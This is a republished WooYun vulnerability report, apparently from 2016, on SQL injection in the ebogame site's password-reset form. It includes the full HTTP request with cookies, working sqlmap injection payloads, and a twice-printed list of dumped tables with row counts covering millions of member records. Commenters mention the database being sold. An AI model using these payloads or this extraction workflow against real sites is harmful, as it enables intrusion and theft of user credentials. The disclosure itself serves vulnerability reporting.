ebogame主站post注入涉及402W万玩家信息(用户名/密码/支付密码等)

admin
admin
admin
139654
文章
114
评论
2017年4月15日04:48:54评论296 views字数 253阅读0分50秒阅读模式
摘要

2016-04-02: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

漏洞概要 关注数(10) 关注此漏洞

缺陷编号: WooYun-2016-191682

漏洞标题: ebogame主站post注入涉及402W万玩家信息(用户名/密码/支付密码等)

相关厂商: ebogame

漏洞作者: DeadSea

提交时间: 2016-04-02 11:30

公开时间: 2016-05-21 11:50

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2016-04-02: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

RT!

详细说明:

code 区域 
http://**.**.**.**/user_findpwd.php?t=email
code 区域 
POST http://**.**.**.**/user_findpwd.php?t=doemail HTTP/1.1
 Host: **.**.**.**
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer: http://**.**.**.**/user_findpwd.php?t=email
 Cookie: Hm_lvt_878250ef6d9058d8708994370fb5132c=1459546008; Hm_lpvt_878250ef6d9058d8708994370fb5132c=1459549499; PHPSESSID=144d2qapb7kfrshd3jdrgv1m76; bdshare_firstime=1459549345620; mrand=243969013; msign=e777f9591b90b0ec41549c14f3e2ea66; MemberName=chinasea; NickName=sea; MemberId=3945514; MemberPass=3d3e9afcb73af50299c8ff572daebb46; bmforumerboardidnum=219
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 77
 
 data%5Bname%5D=1111&data%5Bemail%5D=111111111%**.**.**.**&sub=%E6%8F%90%E4%BA%A4

data%5Bname%5D参数存在注入

code 区域 
sqlmap identified the following injection point(s) with a total of 358 HTTP(s) r
 equests:
 ---
 Parameter: data[name] (POST)
     Type: boolean-based blind
     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
     Payload: data[name]=-1228' OR 5159=5159#&data[email]=111111111@**.**.**.**&sub=%E
 6%8F%90%E4%BA%A4
 
     Type: error-based
     Title: MySQL OR error-based - WHERE or HAVING clause
     Payload: data[name]=-5681' OR 1 GROUP BY CONCAT(0x71706a6b71,(SELECT (CASE W
 HEN (3827=3827) THEN 1 ELSE 0 END)),0x716b767671,FLOOR(RAND(0)*2)) HAVING MIN(0)
 #&data[email]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
     Payload: data[name]=1111' AND (SELECT * FROM (SELECT(SLEEP(5)))XyKJ)#&data[e
 mail]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4
 ---
 [06:38:13] [INFO] the back-end DBMS is MySQL
 web application technology: PHP 5.3.3, Nginx
 back-end DBMS: MySQL 5.0.12

数据如下:

code 区域 
+-----------------------------------+---------+
 | Table                             | Entries |
 +-----------------------------------+---------+
 | ebogame_member_login              | 4026283 |
 | ebogame_member                    | 2350328 |
 | ebogame_activation                | 826836  |
 | ebogame_member_integral           | 691708  |
 | ebogame_charge_20160118           | 465322  |
 | pre_ucenter_members               | 388347  |
 | bbs_userlist                      | 340566  |
 | ebogame_member_info               | 292054  |
 | ebogame_member_serv               | 292044  |
 | ebogame_member_char               | 241395  |
 | ebogame_charge                    | 175353  |
 | api_send_mail                     | 61235   |
 | ebogame_advertising_click         | 52260   |
 | pre_common_district               | 45051   |
 | ebogame_charge_copy               | 43282   |
 | ebogame_questions                 | 36047   |
 | pre_forum_post                    | 27728   |
 | ebogame_game_gift_code_17173      | 20000   |
 | pre_home_notification             | 14236   |
 | pre_common_credit_rule_log        | 13014   |
 | pre_forum_thread                  | 12229   |
 | pre_forum_threadpartake           | 10744   |
 | pre_forum_threadmod               | 9011    |
 | pre_common_member_count           | 8182    |
 | pre_common_member_field_forum     | 8182    |
 | pre_common_member_field_home      | 8182    |
 | pre_common_member_profile         | 8182    |
 | pre_common_member_status          | 8182    |
 | pre_common_member                 | 8174    |
 | pre_common_onlinetime             | 6443    |
 | ebogame_game_code                 | 6210    |
 | bbs_posts                         | 5157    |
 | ebogame_game_gift_code            | 5000    |
 | pre_forum_statlog                 | 4990    |
 | pre_ucenter_memberfields          | 4811    |
 | ebogame_member_price              | 3442    |
 | ebogame_game_gift_code_           | 3000    |
 | ebogame_content                   | 2640    |
 | ebogame_extension_member          | 2591    |
 | ebogame_news                      | 2288    |
 | bbs_apclog                        | 2061    |
 | ebogame_question_reply            | 1668    |
 | pre_forum_attachment              | 1566    |
 | pre_forum_pollvoter               | 1455    |
 | bbs_actlogs                       | 1449    |
 | pre_common_member_crime           | 1239    |
 | pre_forum_modwork                 | 1003    |
 | pre_common_stat                   | 899     |
 | bbs_threads                       | 874     |
 | pre_forum_thread_moderate         | 653     |
 | ebogame_charge_heepay             | 591     |
 | bbs_primsg                        | 517     |
 | pre_common_member_action_log      | 496     |
 | pre_ucenter_pm_indexes            | 419     |
 | pre_forum_threadimage             | 405     |
 | pre_common_setting                | 392     |
 | ebogame_game_areas                | 358     |
 | pre_forum_polloption              | 273     |
 | pre_ucenter_pm_members            | 244     |
 | pre_forum_attachment_1            | 222     |
 | pre_forum_attachment_3            | 212     |
 | pre_forum_attachment_4            | 180     |
 | pre_forum_post_tableid            | 174     |
 | pre_forum_attachment_9            | 168     |
 | pre_forum_attachment_5            | 161     |
 | sglj_extension                    | 154     |
 | ebogame_advertising               | 151     |
 | pre_ucenter_pm_lists              | 129     |
 | pre_forum_attachment_7            | 124     |
 | pre_common_tagitem                | 118     |
 | bbs_ugoptlist                     | 115     |
 | pre_ucenter_pm_messages_0         | 114     |
 | pre_forum_threaddisablepos        | 110     |
 | pre_forum_attachment_6            | 106     |
 | pre_common_block_style            | 103     |
 | pre_forum_attachment_unused       | 103     |
 | pre_forum_attachment_0            | 102     |
 | pre_forum_attachment_2            | 102     |
 | pre_common_syscache               | 95      |
 | pre_ucenter_notelist              | 90      |
 | pre_common_smiley                 | 85      |
 | pre_forum_attachment_8            | 85      |
 | pre_forum_rsscache                | 80      |
 | pre_ucenter_pm_messages_3         | 70      |
 | pre_common_admincp_perm           | 67      |
 | pre_common_member_profile_setting | 51      |
 | pre_forum_poll                    | 49      |
 | pre_ucenter_pm_messages_7         | 49      |
 | pre_common_tag                    | 48      |
 | pre_common_nav                    | 47      |
 | pre_common_stylevar               | 45      |
 | pre_ucenter_newpm                 | 40      |
 | pre_forum_forumfield              | 38      |
 | pre_forum_forum                   | 37      |
 | pre_common_credit_log             | 36      |
 | pre_ucenter_pm_messages_5         | 35      |
 | ebogame_category                  | 33      |
 | ebogame_price                     | 33      |
 | pre_home_friend                   | 32      |
 | pre_common_credit_rule            | 31      |
 | pre_ucenter_pm_messages_2         | 31      |
 | pre_home_friend_request           | 30      |
 | pre_ucenter_pm_messages_6         | 29      |
 | pre_ucenter_settings              | 26      |
 | bbs_emoticons                     | 25      |
 | ebogame_games                     | 25      |
 | pre_ucenter_pm_messages_4         | 25      |
 | bbs_search                        | 23      |
 | pre_ucenter_pm_messages_8         | 23      |
 | ebogame_extension_percent         | 22      |
 | pre_ucenter_pm_messages_9         | 22      |
 | ebogame_extension_settlemen       | 21      |
 | pre_ucenter_pm_messages_1         | 21      |
 | pre_common_cron                   | 18      |
 | pre_common_usergroup              | 16      |
 | pre_common_usergroup_field        | 16      |
 | pre_home_friendlog                | 16      |
 | bbs_forumdata                     | 15      |
 | bbs_tags                          | 15      |
 | pre_home_click                    | 15      |
 | pre_common_report                 | 14      |
 | pre_forum_threadclosed            | 14      |
 | bbs_contacts                      | 13      |
 | pre_forum_replycredit             | 13      |
 | bbs_levels                        | 12      |
 | pre_common_banned                 | 12      |
 | pre_common_session                | 11      |
 | pre_forum_poststick               | 11      |
 | ebogame_game_gift_info_17173      | 10      |
 | pre_forum_medal                   | 10      |
 | ebogame_integral                  | 9       |
 | pre_common_plugin                 | 9       |
 | pre_home_favorite                 | 9       |
 | bbs_usergroup                     | 8       |
 | bbs_polls                         | 7       |
 | pre_forum_warning                 | 7       |
 | ebogame_extension                 | 6       |
 | pre_common_pluginvar              | 6       |
 | pre_forum_moderator               | 6       |
 | pre_forum_typeoption              | 6       |
 | pre_common_admincp_group          | 5       |
 | pre_common_friendlink             | 5       |
 | pre_common_admingroup             | 4       |
 | pre_common_advertisement          | 4       |
 | pre_forum_bbcode                  | 4       |
 | pre_forum_onlinelist              | 4       |
 | ebogame_game_gift_info_           | 3       |
 | pre_common_admincp_member         | 3       |
 | pre_common_failedlogin            | 3       |
 | pre_forum_grouplevel              | 3       |
 | pre_forum_imagetype               | 3       |
 | pre_common_admincp_cmenu          | 2       |
 | pre_common_block                  | 2       |
 | pre_common_credit_rule_log_field  | 2       |
 | pre_common_diy_data               | 2       |
 | pre_common_patch                  | 2       |
 | pre_common_regip                  | 2       |
 | pre_common_template_block         | 2       |
 | pre_common_word_type              | 2       |
 | pre_home_poke                     | 2       |
 | pre_home_pokearchive              | 2       |
 | pre_mobile_setting                | 2       |
 | bbs_favorites                     | 1       |
 | bbs_lastest                       | 1       |
 | pre_common_admincp_session        | 1       |
 | pre_common_cache                  | 1       |
 | pre_common_statuser               | 1       |
 | pre_common_style                  | 1       |
 | pre_common_template               | 1       |
 | pre_ucenter_admins                | 1       |
 | pre_ucenter_applications          | 1       |
 | pre_ucenter_failedlogins          | 1       |
 +-----------------------------------+---------+

漏洞证明:

code 区域 
+-----------------------------------+---------+
 | Table                             | Entries |
 +-----------------------------------+---------+
 | ebogame_member_login              | 4026283 |
 | ebogame_member                    | 2350328 |
 | ebogame_activation                | 826836  |
 | ebogame_member_integral           | 691708  |
 | ebogame_charge_20160118           | 465322  |
 | pre_ucenter_members               | 388347  |
 | bbs_userlist                      | 340566  |
 | ebogame_member_info               | 292054  |
 | ebogame_member_serv               | 292044  |
 | ebogame_member_char               | 241395  |
 | ebogame_charge                    | 175353  |
 | api_send_mail                     | 61235   |
 | ebogame_advertising_click         | 52260   |
 | pre_common_district               | 45051   |
 | ebogame_charge_copy               | 43282   |
 | ebogame_questions                 | 36047   |
 | pre_forum_post                    | 27728   |
 | ebogame_game_gift_code_17173      | 20000   |
 | pre_home_notification             | 14236   |
 | pre_common_credit_rule_log        | 13014   |
 | pre_forum_thread                  | 12229   |
 | pre_forum_threadpartake           | 10744   |
 | pre_forum_threadmod               | 9011    |
 | pre_common_member_count           | 8182    |
 | pre_common_member_field_forum     | 8182    |
 | pre_common_member_field_home      | 8182    |
 | pre_common_member_profile         | 8182    |
 | pre_common_member_status          | 8182    |
 | pre_common_member                 | 8174    |
 | pre_common_onlinetime             | 6443    |
 | ebogame_game_code                 | 6210    |
 | bbs_posts                         | 5157    |
 | ebogame_game_gift_code            | 5000    |
 | pre_forum_statlog                 | 4990    |
 | pre_ucenter_memberfields          | 4811    |
 | ebogame_member_price              | 3442    |
 | ebogame_game_gift_code_           | 3000    |
 | ebogame_content                   | 2640    |
 | ebogame_extension_member          | 2591    |
 | ebogame_news                      | 2288    |
 | bbs_apclog                        | 2061    |
 | ebogame_question_reply            | 1668    |
 | pre_forum_attachment              | 1566    |
 | pre_forum_pollvoter               | 1455    |
 | bbs_actlogs                       | 1449    |
 | pre_common_member_crime           | 1239    |
 | pre_forum_modwork                 | 1003    |
 | pre_common_stat                   | 899     |
 | bbs_threads                       | 874     |
 | pre_forum_thread_moderate         | 653     |
 | ebogame_charge_heepay             | 591     |
 | bbs_primsg                        | 517     |
 | pre_common_member_action_log      | 496     |
 | pre_ucenter_pm_indexes            | 419     |
 | pre_forum_threadimage             | 405     |
 | pre_common_setting                | 392     |
 | ebogame_game_areas                | 358     |
 | pre_forum_polloption              | 273     |
 | pre_ucenter_pm_members            | 244     |
 | pre_forum_attachment_1            | 222     |
 | pre_forum_attachment_3            | 212     |
 | pre_forum_attachment_4            | 180     |
 | pre_forum_post_tableid            | 174     |
 | pre_forum_attachment_9            | 168     |
 | pre_forum_attachment_5            | 161     |
 | sglj_extension                    | 154     |
 | ebogame_advertising               | 151     |
 | pre_ucenter_pm_lists              | 129     |
 | pre_forum_attachment_7            | 124     |
 | pre_common_tagitem                | 118     |
 | bbs_ugoptlist                     | 115     |
 | pre_ucenter_pm_messages_0         | 114     |
 | pre_forum_threaddisablepos        | 110     |
 | pre_forum_attachment_6            | 106     |
 | pre_common_block_style            | 103     |
 | pre_forum_attachment_unused       | 103     |
 | pre_forum_attachment_0            | 102     |
 | pre_forum_attachment_2            | 102     |
 | pre_common_syscache               | 95      |
 | pre_ucenter_notelist              | 90      |
 | pre_common_smiley                 | 85      |
 | pre_forum_attachment_8            | 85      |
 | pre_forum_rsscache                | 80      |
 | pre_ucenter_pm_messages_3         | 70      |
 | pre_common_admincp_perm           | 67      |
 | pre_common_member_profile_setting | 51      |
 | pre_forum_poll                    | 49      |
 | pre_ucenter_pm_messages_7         | 49      |
 | pre_common_tag                    | 48      |
 | pre_common_nav                    | 47      |
 | pre_common_stylevar               | 45      |
 | pre_ucenter_newpm                 | 40      |
 | pre_forum_forumfield              | 38      |
 | pre_forum_forum                   | 37      |
 | pre_common_credit_log             | 36      |
 | pre_ucenter_pm_messages_5         | 35      |
 | ebogame_category                  | 33      |
 | ebogame_price                     | 33      |
 | pre_home_friend                   | 32      |
 | pre_common_credit_rule            | 31      |
 | pre_ucenter_pm_messages_2         | 31      |
 | pre_home_friend_request           | 30      |
 | pre_ucenter_pm_messages_6         | 29      |
 | pre_ucenter_settings              | 26      |
 | bbs_emoticons                     | 25      |
 | ebogame_games                     | 25      |
 | pre_ucenter_pm_messages_4         | 25      |
 | bbs_search                        | 23      |
 | pre_ucenter_pm_messages_8         | 23      |
 | ebogame_extension_percent         | 22      |
 | pre_ucenter_pm_messages_9         | 22      |
 | ebogame_extension_settlemen       | 21      |
 | pre_ucenter_pm_messages_1         | 21      |
 | pre_common_cron                   | 18      |
 | pre_common_usergroup              | 16      |
 | pre_common_usergroup_field        | 16      |
 | pre_home_friendlog                | 16      |
 | bbs_forumdata                     | 15      |
 | bbs_tags                          | 15      |
 | pre_home_click                    | 15      |
 | pre_common_report                 | 14      |
 | pre_forum_threadclosed            | 14      |
 | bbs_contacts                      | 13      |
 | pre_forum_replycredit             | 13      |
 | bbs_levels                        | 12      |
 | pre_common_banned                 | 12      |
 | pre_common_session                | 11      |
 | pre_forum_poststick               | 11      |
 | ebogame_game_gift_info_17173      | 10      |
 | pre_forum_medal                   | 10      |
 | ebogame_integral                  | 9       |
 | pre_common_plugin                 | 9       |
 | pre_home_favorite                 | 9       |
 | bbs_usergroup                     | 8       |
 | bbs_polls                         | 7       |
 | pre_forum_warning                 | 7       |
 | ebogame_extension                 | 6       |
 | pre_common_pluginvar              | 6       |
 | pre_forum_moderator               | 6       |
 | pre_forum_typeoption              | 6       |
 | pre_common_admincp_group          | 5       |
 | pre_common_friendlink             | 5       |
 | pre_common_admingroup             | 4       |
 | pre_common_advertisement          | 4       |
 | pre_forum_bbcode                  | 4       |
 | pre_forum_onlinelist              | 4       |
 | ebogame_game_gift_info_           | 3       |
 | pre_common_admincp_member         | 3       |
 | pre_common_failedlogin            | 3       |
 | pre_forum_grouplevel              | 3       |
 | pre_forum_imagetype               | 3       |
 | pre_common_admincp_cmenu          | 2       |
 | pre_common_block                  | 2       |
 | pre_common_credit_rule_log_field  | 2       |
 | pre_common_diy_data               | 2       |
 | pre_common_patch                  | 2       |
 | pre_common_regip                  | 2       |
 | pre_common_template_block         | 2       |
 | pre_common_word_type              | 2       |
 | pre_home_poke                     | 2       |
 | pre_home_pokearchive              | 2       |
 | pre_mobile_setting                | 2       |
 | bbs_favorites                     | 1       |
 | bbs_lastest                       | 1       |
 | pre_common_admincp_session        | 1       |
 | pre_common_cache                  | 1       |
 | pre_common_statuser               | 1       |
 | pre_common_style                  | 1       |
 | pre_common_template               | 1       |
 | pre_ucenter_admins                | 1       |
 | pre_ucenter_applications          | 1       |
 | pre_ucenter_failedlogins          | 1       |
 +-----------------------------------+---------+

修复方案:

版权声明:转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-06 11:41

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-03 00:01 | ActOr ( 实习白帽子 | Rank:54 漏洞数:5 | 人稳不言,水深不语。)

    1

    这个站已经被日翻了~

  2. 2016-04-03 18:45 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问,还有谁!!!!!!!!!!!!!...)

    1

    @ActOr 我已经看到群里有人在卖了~。~

  3. 2016-04-03 20:16 | ActOr ( 实习白帽子 | Rank:54 漏洞数:5 | 人稳不言,水深不语。)

    1

    @小龙 ebogame和5ebo的库是分开的。这个没用,5ebo还有个网游暗黑之光 - -

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin